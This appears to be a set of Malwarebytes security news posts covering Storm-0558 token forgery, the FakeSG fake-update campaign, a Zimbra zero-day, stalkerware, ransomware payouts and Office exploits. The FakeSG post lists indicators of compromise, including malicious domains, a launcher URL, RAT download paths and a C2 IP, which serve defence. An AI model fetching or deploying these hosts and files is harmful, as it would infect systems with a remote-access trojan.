IT News

Microsoft is getting criticized for the way in which it handled a serious security incident that allowed a suspected Chinese espionage group to access user email from approximately 25 organizations, including government agencies and related consumer accounts in the public cloud. The attacks were targeted and lasted for about a month before they were first discovered.

The investigation started on Jun 16, 2023, when Microsoft was notified by a customer about an anomalous Exchange Online data access. Investigation learned that the customer’s Exchange Online data was accessed using Outlook Web Access (OWA).

Microsoft analysis attributed the activity to a group called Storm-0558 based on established prior tactics, techniques, and procedures (TTPs). Attribution is based on Microsoft Threat Intelligence assessment that Storm-0558 is a China-based threat actor with activities and methods consistent with espionage objectives.

At first Microsoft assumed that the spies were using legitimate Azure Active Directory (Azure AD) tokens stolen by malware. But further analysis showed that Storm-0558 was forging Azure AD tokens using an acquired Microsoft account (MSA) consumer signing key to access OWA and Outlook.com.

This was only possible because of a validation error in Microsoft code. MSA (consumer) keys and Azure AD (enterprise) keys are issued and managed from separate systems and should only be valid for their respective systems. Microsoft says it still doesn’t know how Storm-0558 stole the inactive MSA signing key.

An authentication token allows internet users to access applications, services, websites, and application programming interfaces (APIs) without having to enter their login credentials each time they visit. Instead, the user logs in once, and a unique token is generated and shared with connected applications or websites to verify their identity.

These tokens are validated with a signing key, so with access to such a key an attacker is able to create valid tokens to access the associated services. Storm-0558 was able to obtain new access tokens by presenting one previously issued from GetAccessTokenForResource Application Programming Interface (API) due to a design flaw. This flaw in this API has since been fixed.

When asked, China denied it was involved and basically said people in glass houses shouldn’t throw stones.

“We noted the reports saying that the spokesman for the White House National Security Council claimed that US officials found hackers linked to China took advantage of a security weakness in Microsoft’s cloud-computing to break into unclassified email accounts of the US, and the US has notified Microsoft about this. I would like to say that in the past, it was usually the world’s No.1 hacking group–the US National Security Agency, which also serves as the US Cyber Force Command, that released such kind of disinformation. This time it was the US National Security Council that made a public statement. Whatever agency spoke, it does not change the fact that the US is the world’s biggest hacking empire and global cyber thief.”

What has been done

Microsoft says it has completed mitigation of this attack for all customers and has not found any evidence of further access. The impacted customers have been contacted so no additional customer action is needed to prevent hackers from using the same tactics to access their Exchange or Outlook accounts.

On June 26, OWA stopped accepting tokens issued from GetAccessTokensForResource for renewal, which stopped Storm-0556 ‘s ability to use tokens issued from the Azure program.

On June 27, Microsoft blocked the usage of tokens signed with the acquired MSA key in OWA, blocking the usage of tokens signed with the key that had been acquired.

On June 29, Microsoft completed replacement of the key to prevent the threat actor from using it to forge new tokens.

Microsoft blocked the use of the stolen private signing key for all impacted customers on July 3, 2023 and says it has “substantially hardened key issuance systems since the acquired MSA key was initially issued.”

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Over 5 years ago, we began tracking a new campaign that we called FakeUpdates (also known as SocGholish) that used compromised websites to trick users into running a fake browser update. Instead, victims would end up infecting their computers with the NetSupport RAT, allowing threat actors to gain remote access and deliver additional payloads. As we have seen over the years, SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz.

Now, there is a potential new competitor in the “fake updates” landscape that looks strangely familiar. The new campaign, which we call FakeSG, also relies on hacked WordPress websites to display a custom landing page mimicking the victim’s browser. The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut. While FakeSG appears to be a newcomer, it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could rival potentially rival with SocGholish.  

Campaign similarities

We first heard of this new campaign thanks to a Mastodon post by Randy McEoin. The tactics, techniques and procedures (TTPs) are very similar to those of SocGholish and it would be easy to think the two are related. In fact, this chain also leads to NetSupport RAT. However, the template source code is quite different and the payload delivery uses different infrastructure. As a result, we decided to call this variant FakeSG.

Templates

FakeSG has different browser templates depending on which browser the victim is running. The themed “updates” look very professional and are more up to date than its SocGholish counterpart.

Website injections

Compromised websites (WordPress appears to be the top target) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates. The source code is loaded from one of several domains impersonating Google (google-analytiks[.]com) or Adobe (updateadobeflash[.]website):

That code contains all the web elements (images, fonts, text) needed to render the fake browser update page. We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self-contained Base64 encoded images.

Installation flow

There are different installation flows for this campaign, but we will focus on the one that uses a URL shortcut. The decoy installer (Install%20Updater%20(V104.25.151)-stable.url) is an Internet shortcut downloaded from another compromised WordPress site.

This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server:

This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload (NetSupport RAT).

Malwarebytes’s EDR shows the full attack chain (please click to enlarge):

The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut. The RAT’s main binary is launched from “C:Users%username%AppDataRoamingBranScaleclient32.exe“.

Following a successful infection, callbacks are made to the RAT’s command and control server at 94.158.247[.]27.

Roomates

Fake browser updates are a very common decoy used by malware authors. In addition to SocGholish, the Domen toolkit was a well-built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases. Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest. Stolen credentials can be resold to other threat actors tied to ransomware gangs.

It is interesting to see another contender in this relatively small space. While there is a very large number of vulnerable websites, we already see some that have been injected with multiple different malicious code. From a visitor’s point of view, this means there could be more than one redirect but the “winner” will be the one who is able to execute their malicious JavaScript code first.

We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes. Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks.

Indicators of Compromise (IOCs)

FakeSG infrastructure

178.159.37[.]73
google-analytiks[.]com
googletagmanagar[.]com
updateadobeflash[.]website

WebDav launcher

206[.]71[.]148[.]110
206[.]71[.]148[.]110/Downloads/launcher-upd[.]hta

NetSupport RAT

pietrangelo[.]it/wp-content/uploads/2014/04/BranScale[.]zip
pietrangelo[.]it/wp-content/uploads/2014/04/client32[.]exe

NetSupport RAT C2

94[.]158[.]247[.]27

MITRE ATT&CK techniques

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Last week on Malwarebytes Labs:

• Tax preparation firms shared sensitive information with Meta
• Ransomware making big money through “big game hunting”
• Malwarebytes stops 100% of Advanced Threats in latest AV-Test assessment
• From Malvertising to Ransomware: A ThreatDown webinar recap
• Ransomware review: July 2023
• Zero-day deploys remote code execution vulnerability via Word documents
• How to secure your business before going on vacation
• Update now! Microsoft patches a whopping 130 vulnerabilities
• Proposed Massachusetts law to ban sale of your mobile location data
• Criminals target businesses with malicious extension for Meta’s Ads Manager and accidentally leak stolen accounts
• Apple issues Rapid Security Response for zero-day vulnerability
• “TootRoot” Mastodon vulnerabilities fixed: Admins, patch now!
• Threatening rogue finance apps removed from the Apple Store
• MOVEit Transfer fixes three new vulnerabilities
• Malwarebytes Browser Guard introduces three new features
• Warning issued over increased activity of TrueBot malware

Stay safe!

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Security experts are warning Zimbra users that a vulnerability for which there is no patch is being actively exploited in the wild. In a security update about the vulnerability, the company offered a temporary workaround which users can apply while waiting for a patch to be created.

Zimbra is an open source webmail application used for messaging and collaboration. The vulnerability, which could impact the confidentiality and integrity of users’ data, exists in Zimbra Collaboration Suite Version 8.8.15.

Zimbra is widely used across different industries and government organizations. We reported about a cross-site scripting (XSS) zero-day vulnerability in the Zimbra email platform back in February 2022. At the time, Zimbra claimed there were 200,000 businesses, and over a thousand government and financial institutions, using its software. Thousands of Zimbra mail servers were backdoored in a large scale attack exploiting that vulnerability.

In our June 2023 ransomware review we noted how the MalasLocker ransomware group had targeted vulnerabilities in Zimbra servers, including CVE-2022-24682, to enable remote code execution (RCE). This resulted in MalasLocker taking first place on the list of known attacks over the month of May 2023, displacing perennial top-spot holder LockBit.

Since Zimbra mentions no further details, it is hard to determine what the exact problem is. Although the proposed fix (down below under Mitigation) suggest that there may be a problem which can be exploited by utilizing specially crafted XML files. By using the fn:escapeXml() function, which escapes characters that can be interpreted as XML markup, users will manually add input sanitization.

Zimbra makes no mention of active exploitation, but Google researcher Maddie Stone tweeted about another researcher in the Google Threat Analysis Group noticing the vulnerability being used in-the-wild in a targeted attack.

.@_clem1 discovered this being used in-the-wild in a targeted attack. Thank you to @Zimbra for publishing this advisory and mitigation advice! If you run Zimbra Collaboration Suite, please go manually apply the fix! #itw0days https://t.co/lqwt0kOFWA

— Maddie Stone (@maddiestone) July 13, 2023

Earlier vulnerabilities in Zimbra allowed cybercriminals to steal emails in targeted attacks against organizations in the European government and media sectors.

Mitigation

The Zimbra security update suggests you apply the follow fix manually on all of your mailbox nodes:

1. Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto
2. Then open to edit the active file and go to line number 40
3. Change
   <input name="st" type="hidden" value="${param.st}"/>
   to
   <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>

Zimbra notes that a service restart is not required so you can do it without any downtime.

We will keep you posted when a patch is made available and in case there are other developments around this bug.

We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

The language of a data breach, no matter what company gets hit, is largely the same. There’s the stolen data—be it email addresses, credit card numbers, or even medical records. There are the users—unsuspecting, everyday people who, through no fault of their own, mistakenly put their trust into a company, platform, or service to keep their information safe. And there are, of course, the criminals. Some operate in groups. Some act alone. Some steal data as a means of extortion. Others steal it as a point of pride. All of them, it appears, take something that isn’t theirs. 

But what happens if a cybercriminal takes something that may have already been stolen? 

In late June, a mobile app that can, without consent, pry into text messages, monitor call logs, and track GPS location history, warned its users that its services had been hacked. Email addresses, telephone numbers, and the content of messages were swiped, but how they were originally collected requires scrutiny. That’s because the app itself, called LetMeSpy, is advertised as a parental and employer monitoring app, to be installed on the devices of other people that LetMeSpy users want to track. 

Want to read your child’s text messages? LetMeSpy says it can help. Want to see where they are? LetMeSpy says it can do that, too. What about employers who are interested in the vague idea of “control and safety” of their business? Look no further than LetMeSpy, of course.  

While LetMeSpy’s website tells users that “phone control without your knowledge and consent may be illegal in your country,” (it is in the US and many, many others) the app also claims that it can hide itself from view from the person being tracked. And that feature, in particular, is one of the more tell-tale signs of “stalkerware.” 

Stalkerware is a term used by the cybersecurity industry to describe mobile apps, primarily on Android, that can access a device’s text messages, photos, videos, call records, and GPS locations without the device owner knowing about said surveillance. These types of apps can also automatically record every phone call made and received by a device, turn off a device’s WiFi, and take control of the device’s camera and microphone to snap photos or record audio—all without the victim knowing that their phone has been compromised. 

Stalkerware poses a serious threat—particularly to survivors of domestic abuse—and Malwarebytes has defended users against these types of apps for years. But the hacking of an app with similar functionality raises questions. 

Today, on the Lock and Code podcast with host David Ruiz, we speak with the hacktivist and security blogger maia arson crimew about the data that was revealed in LetMeSpy’s hack, the almost-clumsy efforts by developers to make and market these apps online, and whether this hack—and others in the past—are “good.” 

“I’m the person on the podcast who can say ‘We should hack things,’ because I don’t work for Malwarebytes. But the thing is, I don’t think there really is any other way to get info in this industry.”

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Ransomware generates big money for the groups behind it, with new research confirming (some) of the scale of the problem. Chainalysis, a blockchain research firm, looked at data from monitored cryptocurrency wallets, concluding that around $449 million has been taken from victims in the last six months.

As The Record correctly notes, the actual figure will likely be significantly higher because only monitored wallets are included in the study. In terms of what’s going on out there, payments under $1,000 and above $100,000 are both on the up. It’s claimed that ransomware groups could pull in around $900 million in 2023, with the return of “big game hunting” being one of the key factors for the bump.

What is big game hunting? Well, this is the practice of targeting large, financially well-off corporations in order to secure the biggest possible payouts. Even with the increase in attacks on smaller companies, taking on the big entities is where the most enticing payouts are waiting to be had.

As an example of payout sizes, BlackBasta’s 2023 average payment size is $762,634 and its median is $147,106. Cl0p checks in with a $1,730,486 average and a $1,946,335 median. At the other end of the scale the smaller, less sophisticated deployments such as Phobos creep into view with a $1,719 average and a $300 median.

No matter the size of the payment, they are ultimately securing said payments and continuing to make bank. It’s also suspected that as more firms refuse to pay their extortionists, so too are the ransomware authors responding by increasing their ransom demands. The research also notes that additional tactics are being used in cases of non payment to up the ante further. Threats to leak data, sell it online, break other parts of the business, attack related firms, or even harass employees are all tactics ransomware authors can make use of.

It’s not all doom and gloom where cryptocurrency payments are concerned. With the notable exception of ransomware, cryptocurrency crime across 2023 is in “sharp decline”. Cryptocurrency businesses are getting a handle on scams, users new and old are learning about how to protect their investments, and law enforcement pressure on cryptocurrency fraud is likely having an impact.

Back in the realm of ransomware, things aren’t perhaps quite as good with some of the big hitters from our June ransomware review serving up exploits, dubious “charity donation” requests, and an increase in attacks on education.

Elsewhere, we have students being used to apply pressure to impacted organisations and relentless attacks on schools. It would be unwise to think the scale of ransomware’s day to day impact is in any danger of dropping off anytime soon.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

A group of seven US senators has sent a letter to the heads of the IRS, the Department of Justice, the Federal Trade Commission and the IRS watchdog, revealing that they have found evidence that reveals “a shocking breach of taxpayer privacy by tax prep companies and by Big Tech firms.”

According to the letter, information about tens of millions of US taxpayers was sent by three tax preparation firms to social media giant Meta. The letter asked the agencies to immediately open an investigation.

The tax firms used Pixel code on their websites to track and improve their media campaigns. Pixel is an integral part of Meta’s tracking infrastructure which collects data about people online. Data which is eventually used for targeted advertising, tailored content recommendations, and to train its algorithms.

The Pixel code is freely available and designed to help both the website owner and Meta. The code gathered information like names and email addresses, but also more detailed information, including data on users’ income, filing status, refund amounts, and dependents’ college scholarship amounts.

Despite what you might expect, it doesn’t matter whether the person using the tax filing service has an account on Facebook or other platforms operated by Meta.

One of the tax preparation firms stated that they used the Meta Pixel to deliver a more personalized experience for their customers.

“We did NOT know and were never notified that personal tax information was being collected by Facebook from the Pixel.”

Meta, on the other hand stated that it feels it has been clear in its policies that advertisers should not send sensitive information about people through its business tools.

“Doing so is against our policies and we educate advertisers on properly setting up Business tools to prevent this from occurring. Our system is designed to filter out potentially sensitive data it is able to detect.”

With both sides agreeing that this should not have happened, we wholeheartedly agree, but it does not explain why it happened anyway.

The problem was flagged earlier by the Markup. We reported about their Pixel Hunt project in January of 2022. The Markup also found Google’s analytics tool on one of the tax preparator’s  websites, but that didn’t send out any names, although it did send some of the financial information to Google.

The three tax preparation firms mentioned in the letter are H&R Block, TaxAct, and TaxSlayer. The information gathered on the websites of these firms has been sent to Meta over the course of at least two years.

If you don’t want your information to be gathered and shared by trackers, you can use solutions like Malwarebytes Browser Guard, a browser extension that, among others, blocks third-party ad trackers.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

AV-TEST, a leading independent tester of cybersecurity solutions, has just given Malwarebytes two Advanced awards for the ability of our consumer and business products to protect against the latest attack techniques.

Let’s take a deeper dive into the test and the results.

Advanced Threat Protection test breakdown

AV-Test’s bi-monthly Advanced Threat Protection exam scrutinizes Windows 11 security products, testing their ability to counter new attack methods.

In the April 2023 trial, they assessed defenses against the “Inline Execute Assembly” technique used by data stealers and ransomware. The test involved 10 malware samples sent via spearphishing emails. If not caught early, data stealers could siphon off data, and ransomware could start encrypting data, while communicating with a C2 server. 

Points were given for detecting key attack phases, with a perfect score being 35 points.

In the latest results, both Malwarebytes Premium and Malwarebytes Endpoint Protection aced the test, earning the top “Advanced” rating for detecting 10/10 samples and receiving the full 35/35 points.

Check out the full results: https://www.av-test.org/en/news/advanced-threat-protection-against-the-latest-data-stealers-and-ransomware-techniques/

Advanced test: Enterprise results

Malwarebytes Endpoint Protection successfully detected and blocked all ten instances of malware (5 data stealers and 5 ransomware samples) sent via spearphishing emails in the initial two steps—when they first landed on the system and when they attempted to become active—thereby passing all tests in these phases.

Advanced test: Consumer results

Malwarebytes Premium fared no differently, having also successfully detected and blocked all ten instances of malware when they first landed on the system and attempted to become active.

The foundation for superior Endpoint Detection and Response (EDR)

Malwarebytes Endpoint Protection (EP) is not merely a standalone product; it’s the bedrock of our Malwarebytes Endpoint Detection and Response (EDR) solution.

Leveraging the robust detection and prevention capabilities validated by AV-Test, Malwarebytes EDR constantly monitors endpoint systems and automatically kills processes associated with advanced threat activity. Learn more about our endpoint security solutions.

GET A FREE BUSINESS TRIAL

Learn more about what experts and customers are saying about Malwarebytes:

Malwarebytes recognized as endpoint security leader by G2

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Malwarebytes receives highest rankings in recent third-party tests

Malwarebytes outperforms competition in latest MRG Effitas assessment

An unpatched zero-day vulnerability is currently being abused in the wild, targeting those with an interest in Ukraine. Microsoft reports that CVE-2023-36884 is tied to reports of:

…a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents. An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.

While the CVE is being updated with new information and links to appropriate security information, the Microsoft Security Blog is currently exploring the issue in detail.

This all ties back to a phishing campaign operated by a group being tracked as “Storm-0978” which targets defence and government entities in both Europe and North America. The campaign itself makes use of bait related to the Ukrainian World Congress, a non-profit organisation of “all Ukrainian public organisations in diaspora”.

These infections originate from remote code execution via Word documents exploiting the above Ukraine-themed bait, as well as an “abuse of vulnerabilities contributing to a security feature bypass”. A fake OneDrive loader delivers a backdoor with similarities to RomCom, their primary backdoor tool. It’s unusual to observe websites involved in this kind of attack still be online hours after a reveal, but here are some shots we took of both site and downloads (thanks to Jerome):

Some of the other attacks launched by this group involve distribution of trojanized versions of popular software. Once the backdoor has taken hold, the group “may steal credentials to be used in targeted operations”.

Popular tools used for these installations include trojanized versions of Solarwinds Network Performance Monitor, KeePass, Signal, and Adobe products. Bogus domains imitating the real thing are registered and used as convincing fronts for the infected software.

Microsoft notes that this group also has a hand in ransomware attacks, though it is less targeted in nature and unrelated to any espionage-themed operations. Attacks which have been identified as belonging to Storm-0978 in this realm have impacted finance and telecommunications industries.

A variety of attacks on several fronts, then. 

Microsoft gives the following advice for organisations concerned with the potential threat of compromise from the most recent attacks:

CVE-2023-36884 specific recommendations

• Customers who use Microsoft Defender for Office 365 are protected from attachments that attempt to exploit CVE-2023-36884.
• In current attack chains, the use of the Block all Office applications from creating child processes attack surface reduction rule prevents the vulnerability from being exploited
• Organizations who cannot take advantage of these protections can set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation.  Please note that while these registry settings would mitigate exploitation of this issue, it could affect regular functionality for certain use cases related to these applications.

You could also consider blocking outbound SMB traffic.

We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Our recent webinar From Malvertising to Ransomware highlight the clear connection between malvertising—the practice of embedding malicious code within legitimate online advertisements—and the epidemic of ransomware attacks affecting businesses globally.

Presented by Mark Stockley, security evangelist at Malwarebytes, and Jerome Segura, Director of Threat Intelligence at Malwarebytes, the webinar explains how malvertising has evolved into an effective entry point in the cyberattack “kill chain.”

By leveraging the broad reach and precision targeting of digital advertising, threat actors can compromise systems, gather valuable credentials, and ultimately lay the groundwork for debilitating ransomware attacks. Speakers mention the Royal ransomware group as just one example of a threat actor using this tactic.

Toward the end of the webinar, the speakers provide a set of tips for protecting businesses from these attacks, including the importance of tools such as Endpoint Detection and Response (EDR) and Managed Detection and Response (MDR) in combatting them.

If you missed the live session, it’s not too late to get the low-down on the malvertising-ransomware connection. Watch the full webinar here to ensure you’re informed and prepared to tackle these nasty threats!

Watch the webinar